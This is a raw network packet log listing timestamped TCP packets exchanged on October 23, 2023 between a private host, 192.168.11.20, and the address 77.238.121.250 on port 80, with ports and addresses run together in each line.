                                                                                                                                                                                                        Oct 23, 2023 20:39:43.468054056 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.468223095 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.468271017 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.468341112 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.468467951 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.468544960 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469228029 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469355106 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469429970 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469490051 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469489098 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469546080 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469604969 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469610929 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469659090 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469664097 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469719887 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469786882 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469786882 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469863892 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.469968081 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.471026897 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.471116066 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.471250057 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.471307993 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.471889973 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.471976042 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472043991 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472078085 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472142935 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472157001 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472212076 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472218037 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472275972 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472321987 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472368956 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472476006 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.472995996 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.473079920 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.473135948 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.473195076 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.473246098 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.473282099 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.473297119 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.473341942 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.473489046 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.473526001 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.473645926 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.474752903 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.474845886 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.474925995 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.474941969 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475001097 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475033998 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475090981 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475156069 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475172043 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475215912 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475215912 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475316048 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475342989 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475495100 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475567102 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475622892 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475683928 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475713968 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475790977 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475840092 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476178885 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476258039 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476341009 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476434946 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476464987 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476499081 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476588964 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476651907 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476666927 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476731062 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476785898 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476807117 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476882935 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476891994 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476933002 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476998091 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477042913 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477056980 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477117062 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477145910 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477197886 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477210999 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477287054 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477287054 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477341890 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477365971 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477397919 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477454901 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477456093 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477505922 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477508068 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477560997 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477565050 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477608919 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477623940 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477657080 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477679014 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477716923 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477735996 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477822065 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477885962 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477937937 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477993965 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478043079 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478049994 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478163958 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478166103 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478166103 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478221893 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478316069 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478369951 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478427887 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478492022 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478544950 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478591919 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478609085 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478650093 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478662968 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478688955 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478717089 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478768110 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478779078 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478816032 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478833914 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478864908 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478936911 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478988886 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479055882 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479166031 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479213953 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479270935 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479317904 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479419947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479464054 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479527950 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479582071 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479614973 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479644060 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479680061 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479697943 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479751110 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479784012 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479813099 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479865074 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479899883 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479952097 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480000019 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480000019 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480113029 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480185986 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480242014 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480264902 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480302095 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480359077 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480407000 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480415106 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480456114 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480504036 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480587959 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480609894 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480685949 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480707884 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480746031 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480765104 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480829954 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480849028 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480914116 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.480926037 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481031895 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481057882 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481081009 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481112957 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481177092 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481204033 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481231928 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481251001 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481285095 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481343031 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481391907 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481393099 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481450081 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481461048 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481513023 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481570005 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481605053 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481652021 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481714964 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481725931 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481780052 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481798887 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481878042 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481897116 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.481925011 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482004881 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482045889 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482141018 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482148886 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482249975 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482292891 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482305050 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482364893 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482395887 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482490063 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482510090 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482534885 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482650995 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482733965 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482801914 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482867956 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482925892 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.482980013 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483093023 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483093023 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483093023 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483170033 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483202934 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483278036 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483386040 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483408928 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483526945 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483529091 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483586073 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483639002 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483699083 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483699083 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483747959 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483808041 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483825922 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483903885 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483911991 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.483957052 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484072924 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484078884 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484146118 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484205961 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484235048 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484261990 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484282970 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484314919 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484373093 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484421968 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.484488964 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866405010 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866550922 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866655111 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866666079 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866717100 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866764069 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866779089 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866812944 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866862059 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866873026 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866950035 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.866952896 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867014885 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867068052 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867122889 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867155075 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867197037 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867237091 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867237091 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867295027 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867331982 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867393017 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867399931 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867476940 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867503881 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867598057 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867619991 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867698908 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867713928 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.867774963 CEST5003680192.168.11.2077.238.121.250
